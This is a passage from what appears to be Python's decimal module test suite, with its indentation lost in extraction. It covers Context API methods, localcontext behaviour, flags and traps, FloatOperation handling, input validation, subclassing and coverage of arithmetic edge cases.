self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
